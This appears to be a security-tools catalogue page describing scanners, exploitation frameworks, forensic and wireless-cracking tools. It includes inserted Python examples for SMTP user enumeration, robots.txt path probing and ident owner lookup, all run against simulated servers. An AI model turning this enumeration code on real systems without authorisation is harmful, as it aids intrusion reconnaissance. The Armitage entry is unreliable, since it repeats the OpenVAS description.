Latest Cyber Security Tools

Wfuzz

Description

Wfuzz was created to facilitate web application assessments and is based on a simple concept: it replaces any reference to the FUZZ keyword with the value of a given payload.

A payload in Wfuzz is a source of data.

This simple concept allows any input to be injected into any field of an HTTP request, making it possible to perform complex web security attacks against different web application components.

Wfuzz Tool | IEMLabs

WebSploit

Description

WebSploit is an open source project for:

  • Social engineering work
  • Scanning, crawling and analysis of web sites
  • Automatic exploitation
  • Network attack support
  • Autopwn: uses Metasploit to scan and exploit target services
  • wmap: scans and crawls targets using the Metasploit wmap plugin

WebScarab

Description

WebScarab is designed to be a tool for anyone who needs to expose the workings of an HTTP(S) based application, whether to allow the developer to debug otherwise difficult problems, or to allow a security specialist to identify vulnerabilities in the way that the application has been designed or implemented.

It aims to become a tool that may be used automatically or interactively to test web applications for their security.


w3af

Description

w3af is a Web Application Attack and Audit Framework which aims to identify and exploit all web application vulnerabilities. This package provides a graphical user interface (GUI) for the framework. If you want a command-line application only, install w3af-console. The framework has been called the “metasploit for the web”, but it’s actually much more than that, because it also discovers the web application vulnerabilities using black-box scanning techniques.


PadBuster

Description

PadBuster is a Perl script for automating Padding Oracle Attacks. PadBuster provides the capability to decrypt arbitrary ciphertext, encrypt arbitrary plaintext, and perform automated response analysis to determine whether a request is vulnerable to padding oracle attacks.


JoomScan

Description

OWASP Joomla! Vulnerability Scanner (JoomScan) is an open source project, developed with the aim of automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments. Implemented in Perl, this tool enables seamless and effortless scanning of Joomla installations, while leaving a minimal footprint with its lightweight and modular architecture. It not only detects known offensive vulnerabilities, but also is able to detect many misconfigurations and admin-level shortcomings that can be exploited by adversaries to compromise the system.


Jboss-autopwn

Description

 This JBoss script deploys a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to provide an interactive session.

Features include:

  • Multiplatform support – tested on Windows, Linux and Mac targets
  • Support for bind and reverse bind shells
  • Meterpreter shells and VNC support for Windows targets

Grabber

Description

Grabber is a black box web application vulnerability scanner that looks for SQL Injection, Blind SQL injection, XSS vulnerability and File include injection.

The tool aims to be quite generic, and can work with any kind of web application regardless of the server side programming language. The tool is designed to be a simple, efficient way to detect vulnerabilities in a small simple


Gobuster

Description

Gobuster is a tool used to brute-force:

  • URIs (directories and files) in web sites.
  • DNS subdomains (with wildcard support).

Because I wanted:

  1. something that didn’t have a fat Java GUI (console FTW).
  2. to build something that just worked on the command line.
  3. something that did not do recursive brute force.

FunkLoad

Description

FunkLoad is a functional and load web tester, written in Python, whose main use cases are:

  • Functional testing of web projects, and thus regression testing as well.
  • Performance testing: by loading the web application and monitoring your servers it helps you to pinpoint bottlenecks, giving a detailed report of performance measurement.
  • Load testing tool to expose bugs that do not surface in cursory testing, like volume testing or longevity testing.

Fimap

Description

fimap is a little Python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap, just for LFI/RFI bugs instead of SQL injection. It’s currently under heavy development but it’s usable.


DirBuster

Description

DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers. It is often the case now that what looks like a web server in a default installation state actually is not, and has pages and applications hidden within. DirBuster attempts to find these. However, tools of this nature are often only as good as the directory and file list they come with.


DIRB

Description

DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response.

DIRB comes with a set of preconfigured attack wordlists for easy usage, but you can use your own custom wordlists. DIRB can also sometimes be used as a classic CGI scanner, but remember that it is a content scanner, not a vulnerability scanner.


Deblaze

Description

Through the use of the Flex programming model and the ActionScript language, Flash Remoting was born. Flash applications can make requests to a remote server to call server side functions, such as looking up accounts, retrieving additional data and graphics, and performing complex business operations. However, the ability to call remote methods also increases the attack surface exposed by these applications. This tool will allow you to perform method enumeration and interrogation against flash remoting end points.


DAVTest

Description

DAVTest tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which allow for command execution or other actions directly on the target. It is meant for penetration testers to quickly and easily determine if enabled DAV services are exploitable.

DAVTest supports:


BlindElephant

Description

The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all available releases.

The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable.


Arachni

Description

Arachni is an Open Source, feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

It is smart, it trains itself by learning from the HTTP responses it receives during the audit process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify false-positives.


Volatility Framework

Description

The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independently of the system being investigated, but offer unprecedented visibility into the runtime state of the system.


RegRipper

Description

RegRipper is an open source tool, written in Perl, for extracting/parsing information (keys, values, data) from the Registry and presenting it for analysis.

RegRipper consists of two basic tools, both of which provide similar capability. The RegRipper GUI allows the analyst to select a hive to parse, an output file for the results, and a profile (list of plugins) to run against the hive. When the analyst launches the tool against the hive, the results go to the file that the analyst designated. If the analyst chooses to parse the System hive, they might also choose to send the results to system.txt.


Peepdf

Description

peepdf is a Python tool to explore PDF files in order to find out whether the file can be harmful or not. The aim of this tool is to provide all the necessary components that a security researcher could need in a PDF analysis without using 3 or 4 tools to carry out all the tasks. With peepdf it’s possible to see all the objects in the document, with the suspicious elements highlighted; it supports the most commonly used filters and encodings.


Guymager

Description

Guymager is a free forensic imager for media acquisition. Its main features are:

  • Easy user interface in different languages
  • Runs under Linux
  • Really fast, due to multi-threaded, pipelined design and multi-threaded data compression

Foremost

Description

Foremost is a forensic program to recover lost files based on their headers, footers, and internal data structures. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc, or directly on a drive. The headers and footers can be specified by a configuration file or you can use command line switches to specify built-in file types. These built-in types look at the data structures of a given file format allowing for a more reliable and faster recovery.


Extundelete

Description

extundelete is a utility that can recover deleted files from an ext3 or ext4 partition. The ext3 and ext4 file systems are the most common default file systems in Linux distributions like Mint, Mageia, or Ubuntu. extundelete uses information stored in the partition’s journal to attempt to recover a file that has been deleted from the partition.


Dumpzilla

Description

The Dumpzilla application is developed in Python 3.x and its purpose is to extract all forensically interesting information from the Firefox, Iceweasel and Seamonkey browsers for analysis. Because it is developed for Python 3.x, it might not work properly in old Python versions, mainly with certain characters.


Distorm3

Description

diStorm is a lightweight, easy-to-use and fast decomposer library. diStorm disassembles instructions in 16, 32 and 64 bit modes. Supported instruction sets: FPU, MMX, SSE, SSE2, SSE3, SSSE3, SSE4, 3DNow! (w/ extensions), new x86-64 instruction sets, VMX, AMD’s SVM and AVX. The output of the new diStorm interface is a special structure that can describe any x86 instruction; this structure can later be formatted into text for display as well.


DFF

Description

 DFF (Digital Forensics Framework) is a free and Open Source computer forensics software built on top of a dedicated Application Programming Interface (API).

It can be used both by professional and non-expert people in order to quickly and easily collect, preserve and reveal digital evidence without compromising systems and data.

  • Preserve digital chain of custody: Software write blocker, cryptographic hash calculation

ddrescue

Description

Like dd, dd_rescue copies data from one file or block device to another. You can specify file positions (called seek and skip in dd). There are several differences:

  • dd_rescue does not provide character conversions.
  • The command syntax is different. Call dd_rescue -h.

Chntpw

Description

This little program will enable you to view some information and change user passwords in a Windows NT SAM user database file. You do not need to know the old passwords. However, you need to get at the file some way or another yourself.


Capstone

Description

Capstone is a disassembly framework with the target of becoming the ultimate disasm engine for binary analysis and reversing in the security community.

Created by Nguyen Anh Quynh, then developed and maintained by a small community, Capstone offers some unparalleled features:


Binwalk

Description

Binwalk is a tool for searching a given binary image for embedded files and executable code. Specifically, it is designed for identifying files and code embedded inside of firmware images. Binwalk uses the libmagic library, so it is compatible with magic signatures created for the Unix file utility. Binwalk also includes a custom magic signature file which contains improved signatures for files that are commonly found in firmware images such as compressed/archived files, firmware headers, Linux kernels, bootloaders, filesystems, etc.


Wifite

Description

Wifite attacks multiple WEP, WPA, and WPS encrypted networks in a row. This tool is customizable and can be automated with only a few arguments. Wifite aims to be the “set it and forget it” wireless auditing tool.

Features:

  • sorts targets by signal strength (in dB); cracks closest access points first

Wifitap

Description

Wifitap is a proof of concept for communication over WiFi networks using traffic injection.

Wifitap allows any application to send and receive IP packets using 802.11 traffic capture and injection over a WiFi network, simply by configuring wj0, which means:

  • setting an IP address consistent with target network address range
  • routing desired traffic through it

Wifiphisher

Description

Wifiphisher is a security tool that mounts automated phishing attacks against Wi-Fi networks in order to obtain credentials or infect the victims with ‘malware’. It is a social engineering attack that can be used to obtain WPA/WPA2 secret passphrases and unlike other methods, it does not require any brute forcing.

After achieving a man-in-the-middle position using the Evil Twin attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page.

Wifi Honey

Description

This script creates five monitor mode interfaces, four are used as APs and the fifth is used for airodump-ng. To make things easier, rather than having five windows all this is done in a screen session which allows you to switch between screens to see what is going on. All sessions are labelled so you know which is which.


Spooftooph

Description

Spooftooph is designed to automate spoofing or cloning Bluetooth device information, making a Bluetooth device hide in plain sight.

Features:

  • Clone and log Bluetooth device information
  • Generate a random new Bluetooth profile
  • Change Bluetooth profile every X seconds

rtlsdr-Scanner

Description

A cross platform Python frequency scanning GUI for USB TV dongles, using the OsmoSDR rtl-sdr library.

In other words a cheap, simple Spectrum Analyser.

The scanner attempts to overcome the tuner’s frequency response by averaging scans from both the positive and negative frequency offsets of the baseband data.


Redfang

Description

redfang is a small proof-of-concept application to find non-discoverable Bluetooth devices. This is done by brute forcing the last six (6) bytes of the Bluetooth address of the device and doing a read_remote_name(). This release of redfang now supports multiple threads, has been modified to handle multiple devices, and the code has been streamlined.

Features:


PixieWPS

Description

Pixiewps is a tool written in C used to brute-force the WPS PIN offline by exploiting the low or non-existent entropy of some APs (the pixie dust attack). It is meant for educational purposes only. All credits for the research go to Dominique Bongard.

Features:


mfcuk

Description

Toolkit containing samples and various tools based on and around libnfc and crapto1, with emphasis on Mifare Classic NXP/Philips RFID cards.


Gr-scan

Description

gr-scan is a program written in C++, and built upon GNU Radio, rtl-sdr, and the OsmoSDR Source Block. It is intended to scan a range of frequencies and print a list of discovered signals. It should work with any device that works with that block, including Realtek RTL2832U devices. I developed this software using a Compro U620F, which uses an E4000 tuner.


Gqrx

Description

Gqrx is a software defined radio receiver powered by the GNU Radio SDR framework and the Qt graphical toolkit. Gqrx supports much of the SDR hardware available, including Funcube Dongles, rtl-sdr, HackRF and USRP devices. See supported devices for a complete list. Gqrx is free and hacker friendly software.


GISKismet

Description

GISKismet is a wireless recon visualization tool to represent data gathered using Kismet in a flexible manner. GISKismet stores the information in a database so that the user can generate graphs using SQL. GISKismet currently uses SQLite for the database and GoogleEarth / KML files for graphing. GISKismet supports Kismet-newcore and Kismet-devel.


FreeRADIUS-WPE

Description

 The FreeRADIUS Server Project is a high performance and highly configurable multi-protocol policy server, supporting RADIUS, DHCPv4 and VMPS. It is available under the terms of the GNU GPLv2. Using RADIUS allows authentication and authorization for a network to be centralized, and minimizes the number of changes that have to be done when adding or deleting new users to a network.


Fern Wifi Cracker

Description

Fern Wifi Cracker is a wireless security auditing and attack program written in the Python programming language and the Python Qt GUI library. The program is able to crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or ethernet based networks.

Fern Wifi Cracker currently supports the following features:


eapmd5pass

Description

EAP-MD5 is a legacy authentication mechanism that does not provide sufficient protection for user authentication credentials. Users who authenticate using EAP-MD5 subject themselves to an offline dictionary attack vulnerability. This tool reads from a live network interface in monitor-mode, or from a stored libpcap capture file, and extracts the portions of the EAP-MD5 authentication exchange.


coWPAtty

Description

Implementation of an offline dictionary attack against WPA/WPA2 networks using PSK-based authentication (e.g. WPA-Personal). Many enterprise networks deploy PSK-based authentication mechanisms for WPA/WPA2 since it is much easier than establishing the necessary RADIUS, supplicant and certificate authority architecture needed for WPA-Enterprise authentication.


Bully

Description

Bully is a new implementation of the WPS brute force attack, written in C. It is conceptually identical to other programs, in that it exploits the (now well known) design flaw in the WPS specification. It has several advantages over the original reaver code. These include fewer dependencies, improved memory and CPU performance, correct handling of endianness, and a more robust set of options. It runs on Linux, and was specifically developed to run on embedded Linux systems (OpenWrt, etc) regardless of architecture.


BlueRanger

Description

BlueRanger is a simple Bash script which uses Link Quality to locate Bluetooth device radios. It sends l2cap (Bluetooth) pings to create a connection between Bluetooth interfaces, since most devices allow pings without any authentication or authorization. The higher the link quality, the closer the device (in theory).

Use a Bluetooth Class 1 adapter for long range location detection. Switch to a Class 3 adapter for more precise short range locating.


Bluepot

Description

Bluepot is a Bluetooth Honeypot written in Java, and it runs on Linux.

Bluepot was a third year university project attempting to implement a fully functional Bluetooth Honeypot: a piece of software designed to accept and store any malware sent to it and interact with common Bluetooth attacks such as “BlueBugging” and “BlueSnarfing”. Bluetooth connectivity is provided via hardware Bluetooth dongles.


Bluemaho

Description

BlueMaho is a GUI shell (interface) for a suite of tools for testing the security of Bluetooth devices. It is freeware, open source, written in Python and uses wxPython. It can be used for testing BT devices for known vulnerabilities and, most importantly, for testing to find unknown vulnerabilities. It can also produce useful statistics.

Features:


Bluelog

Description

Bluelog is a Linux Bluetooth scanner with optional daemon mode and web front-end, designed for site surveys and traffic monitoring. It’s intended to be run for long periods of time in a static location to determine how many discoverable Bluetooth devices there are in the area.


Linux Exploit Suggester

Description

As the name suggests, this is a Linux Exploit Suggester, with no frills and no fancy features; just a simple script to keep track of vulnerabilities and suggest possible exploits to use to gain ‘root’ on a legitimate penetration test, or for a governing examining body. The LES tool is designed to assist in detecting security deficiencies on a given Linux kernel or Linux-based machine.



Exploitdb

Description

The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of exploits, shellcode and papers gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database.


Crackle

Description

crackle cracks BLE Encryption (AKA Bluetooth Smart).

crackle exploits a flaw in the BLE pairing process that allows an attacker to guess or very quickly brute force the TK (Temporary Key). With the TK and other data collected from the pairing process, the STK (Short Term Key) and later the LTK (Long Term Key) can be collected.


Commix

Description

Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool written by Anastasios Stasinopoulos that can be used by web developers, penetration testers or even security researchers in order to test web-based applications with the aim of finding bugs, errors or vulnerabilities related to command injection attacks.


Backdoor Factory

Description

The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.

Supporting: Windows PE x32/x64 and Linux ELF x32/x64 (System V)


Armitage

Description

OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution. The framework is part of Greenbone Networks’ commercial vulnerability management solution from which developments have contributed to the Open Source community since 2009.


Yersinia

Description

Yersinia is a framework for performing layer 2 attacks. It is designed to take advantage of some weaknesses in different network protocols. It aims to be a solid framework for analyzing and testing the deployed networks and systems.


Unix-privesc-check

Description

Shell script to check for simple privilege escalation vectors on Unix systems.

Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HP UX 11, Various Linuxes, FreeBSD 6.2).


THC-IPV6

Description

The THC IPV6 ATTACK TOOLKIT already comes with lots of effective attacking tools:

  • parasite6: ICMPv6 neighbor solicitation/advertisement spoofer, puts you as man-in-the-middle, same as ARP mitm (and parasite)
  • alive6: an effective alive scanning, which will detect all systems listening to this address


Openvas

Description

OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution. The framework is part of Greenbone Networks’ commercial vulnerability management solution from which developments have contributed to the Open Source community since 2009.


Ohrwurm

Description

ohrwurm is a small and simple RTP fuzzer that has been successfully tested on a small number of SIP phones. Features:

  • reads SIP messages to get information of the RTP port numbers
  • reading SIP can be omitted by providing the RTP port numbers, so that any RTP traffic can be fuzzed

jSQL Injection

Description

 jSQL Injection is a lightweight application used to find database information from a distant server.

It is free, open source and it works cross-platform on Windows, Linux and Mac OS X with Java from version 8 to 15. jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in various other distributions like Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux.


Hexorbase

Description

HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location. It is capable of performing SQL queries and brute force attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL).


Doona

Description

Doona is a fork of the Bruteforce Exploit Detector Tool (BED). BED is a program which is designed to check daemons for potential buffer overflows, format string bugs etc. Doona is Australian for duvet. It adds a significant number of features/changes to BED.


Cisco Global Exploiter

Description

Cisco Global Exploiter (CGE) is an advanced, simple and fast security testing tool that is able to exploit the most dangerous vulnerabilities of Cisco systems. CGE has an intuitive and simple user interface and is executable from the command line by supplying two simple parameters: the target and the vulnerability to exploit.


Xplico

Description

Xplico is a Network Forensic Analysis Tool (NFAT) for Unix and Unix-like operating systems. It uses libpcap, a packet capture and filtering library.

Xplico in console mode lets you decode a single pcap file or a directory of pcap files, or decode in real time from an ethernet interface (eth0, eth1, …).


WOL-E

Description

WOL-E is a suite of tools for the Wake on LAN feature of network attached computers, which is now enabled by default on many Apple computers.

These tools include:

  • Bruteforcing the MAC address to wake up clients.


Wireshark

Description

Wireshark is a network traffic analyzer, or “sniffer”, for Linux, macOS, *BSD and other Unix and Unix-like operating systems and for Windows. It uses Qt, a graphical user interface library, and libpcap and npcap as packet capture and filtering libraries.


URLCrazy

Description

URLCrazy is an OSINT tool to generate and test domain typos or variations to detect or perform typosquatting, URL hijacking, phishing, and corporate espionage.


Unicornscan

Description

Unicornscan is a new information gathering and correlation engine built for and by members of the security research and testing communities. It was designed to provide an engine that is Scalable, Accurate, Flexible, and Efficient. It is released for the community to use under the terms of the GPL license.


theHarvester

Description

The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database.

This tool is intended to help Penetration testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization.


Sublist3r

Description

Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS.

subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.


Twofi

Description

When attempting to crack passwords custom word lists are very useful additions to standard dictionaries.

An interesting idea originally released on the “7 Habits of Highly Effective Hackers” blog was to use Twitter to help generate those lists based on searches for keywords related to the list that is being cracked.


SSLyze

Description

SSLyze is a Python tool that can analyze the SSL configuration of a server by connecting to it. It is designed to be fast and comprehensive, and should help organizations and testers identify misconfigurations affecting their SSL servers.


SSLstrip

Description

sslstrip is a tool that transparently hijacks HTTP traffic on a network, watches for HTTPS links and redirects, and then maps those links into look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.


SSLsplit

Description

SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing.


SSLcaudit

Description

The goal of sslcaudit project is to develop a utility to automate testing SSL/TLS clients for resistance against MITM attacks. It might be useful for testing a thick client, a mobile application, an appliance, pretty much anything communicating over SSL/TLS over TCP.


SPARTA

Description

SPARTA is a python GUI application that simplifies network infrastructure penetration testing by aiding the penetration tester in the scanning and enumeration phase. It allows the tester to save time by having point-and-click access to their toolkit and by displaying all tool output in a convenient way. If less time is spent setting up commands and tools, more time can be spent focusing on analysing results.

Sparta Tool | IEMLabs

Snmp-check

Description

Like snmpwalk, snmp-check lets you enumerate SNMP devices and presents the output in a human-readable format. It can be useful for penetration testing or systems monitoring. Distributed under the GPL licence and based on the “Athena-2k” script by jshaw.

Snmp-check Tool | IEMLabs

Smtp-user-enum

Description

Smtp-user-enum is a tool for enumerating OS-level user accounts on Solaris via the SMTP service (sendmail). Enumeration is performed by inspecting the responses to VRFY, EXPN and RCPT TO commands. It could be adapted to work against other vulnerable SMTP daemons, but this hasn’t been done as of v1.0.

Smtp-user-enum Tool | IEMLabs
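
The reply-code logic behind the VRFY and RCPT TO probing described above, as an added example that is not smtp-user-enum's own code. It is driven against a constructed in-memory responder (`FakeSmtpServer`, with a made-up user set and the mail.example domain) so it runs offline; on an engagement `send` would write each line to a socket on 25/TCP and return the server's reply.

```python
"""Added example, not smtp-user-enum's own code: the reply-code logic behind
VRFY and RCPT TO user enumeration, driven against a constructed in-memory
responder so it runs offline. On an engagement, `send` would write to a
socket on 25/TCP and return the server's reply line."""
from typing import Callable, Dict, List, Set

KNOWN_USERS: Set[str] = {"root", "postmaster", "alice"}   # constructed for the demo


class FakeSmtpServer:
    """Stand-in for a sendmail-style daemon. 250 = the mailbox exists,
    550 = unknown user, 252 = VRFY disabled (the usual hardening). RCPT TO
    cannot be disabled, although a server can answer 250 for every recipient
    (catch-all) and so defeat the check."""

    def __init__(self, users: Set[str], vrfy_enabled: bool = True) -> None:
        self.users = users
        self.vrfy_enabled = vrfy_enabled

    def send(self, line: str) -> str:
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb == "HELO":
            return "250 mail.example Hello"
        if verb == "MAIL":
            return "250 2.1.0 Sender ok"
        if verb == "VRFY":
            if not self.vrfy_enabled:
                return "252 2.5.2 Cannot VRFY user; try RCPT to attempt delivery"
            if arg in self.users:
                return "250 2.1.5 %s <%s@mail.example>" % (arg, arg)
            return "550 5.1.1 %s... User unknown" % arg
        if verb == "RCPT":
            mailbox = arg.partition(":")[2].strip(" <>")
            user = mailbox.split("@", 1)[0]
            return "250 2.1.5 Recipient ok" if user in self.users else "550 5.1.1 User unknown"
        return "500 5.5.1 Command unrecognized"


def classify(reply: str) -> str:
    """Map the three-digit SMTP reply code to an enumeration verdict."""
    code = reply[:3]
    if code == "250":
        return "exists"
    if code in ("550", "551", "553"):
        return "unknown"
    if code == "252":
        return "unverifiable"      # VRFY refused: switch to RCPT mode
    return "error"


def enumerate_users(send: Callable[[str], str], candidates: List[str],
                    mode: str = "VRFY") -> Dict[str, str]:
    """Probe each candidate with VRFY (default) or RCPT TO and return
    {username: verdict}."""
    results: Dict[str, str] = {}
    send("HELO scanner.example")
    if mode == "RCPT":
        send("MAIL FROM:<probe@scanner.example>")   # RCPT needs an envelope sender
    for user in candidates:
        if mode == "RCPT":
            reply = send("RCPT TO:<%s@mail.example>" % user)
        else:
            reply = send("VRFY %s" % user)
        results[user] = classify(reply)
    return results
```

The 252 branch is the one to watch for on a hardened host: it means VRFY is answered but useless, and the RCPT TO mode is the fallback. Before trusting a run of "exists" verdicts in RCPT mode, probe an obviously bogus name; if it also comes back 250 the server is catch-all and the results say nothing.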

SMBMap

Description

SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks.

SMBMap Tool | IEMLabs

Social Engineer Toolkit(SET)

Description

The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC – an information security consulting firm located in Cleveland, Ohio.

SET Tool | IEMLabs

Recon-ng Framework

Description

Recon-ng is a full-featured reconnaissance framework designed with the goal of providing a powerful environment to conduct open source web-based reconnaissance quickly and thoroughly.

Recon-ng Tool | IEMLabs

Parsero

Description

Parsero is a free script written in Python which reads the robots.txt file of a web server and looks at the Disallow entries. The Disallow entries tell search engines which directories or files hosted on the web server must not be indexed. For example, “Disallow: /portal/login” means that the content at www.example.com/portal/login is not to be indexed by crawlers such as Google, Bing or Yahoo. This is how an administrator keeps sensitive or private content out of search engines, but the same entries hand anyone who reads robots.txt a list of paths worth requesting directly.

Parsero Tool | IEMLabs
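
The Disallow handling described above, as an added example that is not Parsero's own code: parse a robots.txt body, collect the Disallow entries per user-agent, and build the URLs a tester would request to see which of those "hidden" resources actually answer. The robots.txt text is constructed, and `fetch` is a hook that in a real run would perform an HTTP GET and return the status code.

```python
"""Added example, not Parsero's own code: parse a robots.txt body, collect the
Disallow entries per user-agent, and build the URLs a tester would request
to see which of those "hidden" resources actually answer. The robots.txt
text is constructed; `fetch` is a hook that in a real run would perform an
HTTP GET and return the status code."""
from typing import Callable, Dict, List
from urllib.parse import urljoin

SAMPLE_ROBOTS = """# constructed sample robots.txt
User-agent: *
Disallow: /portal/login
Disallow: /backup/
Disallow: /*.sql$
Disallow:
Allow: /public/

User-agent: BadBot
Disallow: /
"""


def parse_disallow(robots_txt: str) -> Dict[str, List[str]]:
    """Return {user-agent: [disallowed paths]} in file order. Comments, empty
    Disallow values (which mean 'allow everything') and wildcard patterns are
    skipped because they do not name one concrete resource to request."""
    result: Dict[str, List[str]] = {}
    agents: List[str] = []
    last_was_agent = False
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()
        if ":" not in line:
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            # Consecutive User-agent lines share the rules that follow them.
            agents = agents + [value] if last_was_agent else [value]
            result.setdefault(value, [])
            last_was_agent = True
            continue
        last_was_agent = False
        if field == "disallow" and value and not any(c in value for c in "*$"):
            for agent in agents:
                result[agent].append(value)
    return result


def candidate_urls(base: str, robots_txt: str) -> List[str]:
    """Resolve every disallowed path against the site root, de-duplicated."""
    urls: List[str] = []
    for paths in parse_disallow(robots_txt).values():
        for path in paths:
            url = urljoin(base, path)
            if url not in urls:
                urls.append(url)
    return urls


def probe(base: str, robots_txt: str, fetch: Callable[[str], int]) -> Dict[str, int]:
    """Request each candidate and record the status. A 200 here is a resource
    the administrator hid from search engines but not from anyone who reads
    robots.txt, which is the exposure Parsero reports."""
    return {url: fetch(url) for url in candidate_urls(base, robots_txt)}
```

Wildcard entries such as `/*.sql$` are dropped here because they are patterns, not resources; on a real assessment they are still worth noting, since they tell you what file types the administrator is worried about.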

OSRFramework

Description

OSRFramework is a GNU AGPLv3+ set of libraries developed by i3visio to perform Open Source Intelligence collection tasks. It includes a number of applications for username checking, DNS lookups, information-leak research, deep web search, regular-expression extraction and more. By means of ad-hoc Maltego transforms, OSRFramework also lets these queries be run graphically, and it offers several other interfaces such as OSRFConsole or a web interface.

OSRFramework Tool | IEMLabs

ntopng

Description

Ntopng is a web-based network traffic monitoring application released under GPLv3. It is the new incarnation of the original ntop written in 1998, and now revamped in terms of performance, usability, and features.

Ntopng Tool | IEMLabs

Metagoofil

Description

Metagoofil is a tool for extracting metadata from public documents (pdf, doc, xls, ppt, etc.) available on the target websites. This information can be useful because it yields valid usernames and people's names for later use in brute-force password attacks (VPN, FTP, web apps). The tool also extracts interesting “paths” from the documents, from which shared resource names, server names and so on can be learned.

Metagoofil Tool | IEMLabs

Masscan

Description

This is an Internet-scale port scanner. It can scan the entire Internet in under 6 minutes, transmitting 10 million packets per second, from a single machine.

Its input/output is similar to nmap, the most famous port scanner. When in doubt, try one of those features.

Masscan Tool | IEMLabs

Intrace

Description

InTrace is a traceroute-like application that enables users to enumerate IP hops using existing TCP connections, both initiated from local network (local system) or from remote hosts. It could be useful for network reconnaissance and firewall bypassing.

InTrace Tool | IEMLabs

Ident-user-enum

Description

Ident-user-enum is a simple Perl script to query the ident service (113/TCP) in order to determine the owner of the process listening on each TCP port of a target system.

Ident-user-enum Tool | IEMLabs
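
The query and reply format behind the ident lookup described above, as an added example that is not ident-user-enum's own code. The RFC 1413 exchange is `<server-port>, <client-port>` from the client and `<server-port> , <client-port> : USERID : <opsys> : <user>` (or `: ERROR : <type>`) back; identd only answers for a connection that currently exists, so the tool first connects to each port and then asks about that connection's port pair. The replies below are constructed; in a real run `send` would write the query to 113/TCP on the target and return the response line.

```python
"""Added example, not ident-user-enum's own code: build the RFC 1413 ident
query for each open TCP port on a target and parse the reply into the
owning user. The replies below are constructed; in a real run `send` would
write the query to 113/TCP on the target and return the response line."""
import re
from typing import Callable, Dict, Iterable, Optional

# <server-port> , <client-port> : USERID : <opsys>[,charset] : <user>
# <server-port> , <client-port> : ERROR : <error-type>
_REPLY = re.compile(r"^\s*(\d+)\s*,\s*(\d+)\s*:\s*(USERID|ERROR)\s*:\s*(.*?)\s*$")


def ident_query(server_port: int, client_port: int) -> bytes:
    """Request line per RFC 1413: the port on the queried host first, then the
    port on our side of the connection being asked about."""
    return ("%d, %d\r\n" % (server_port, client_port)).encode("ascii")


def parse_ident_reply(line: str) -> Dict[str, Optional[str]]:
    """Return {'status': ok|error|malformed, 'user': ..., 'detail': ...}."""
    m = _REPLY.match(line)
    if not m:
        return {"status": "malformed", "user": None, "detail": line.strip()}
    _sport, _cport, kind, rest = m.groups()
    if kind == "ERROR":
        # NO-USER, HIDDEN-USER, INVALID-PORT or UNKNOWN-ERROR
        return {"status": "error", "user": None, "detail": rest}
    opsys, _, user = rest.partition(":")
    return {"status": "ok", "user": user.strip(), "detail": opsys.strip()}


def enumerate_owners(send: Callable[[bytes], str], open_ports: Iterable[int],
                     client_port: int = 40000) -> Dict[int, Optional[str]]:
    """Ask the target's identd who owns the process behind each open port."""
    owners: Dict[int, Optional[str]] = {}
    for port in open_ports:
        reply = parse_ident_reply(send(ident_query(port, client_port)))
        owners[port] = reply["user"] if reply["status"] == "ok" else None
    return owners


# Constructed identd responses standing in for a real target.
DEMO_REPLIES = {
    22: "22 , 40000 : USERID : UNIX : root",
    80: "80 , 40000 : USERID : UNIX : www-data",
    3306: "3306 , 40000 : ERROR : HIDDEN-USER",
}


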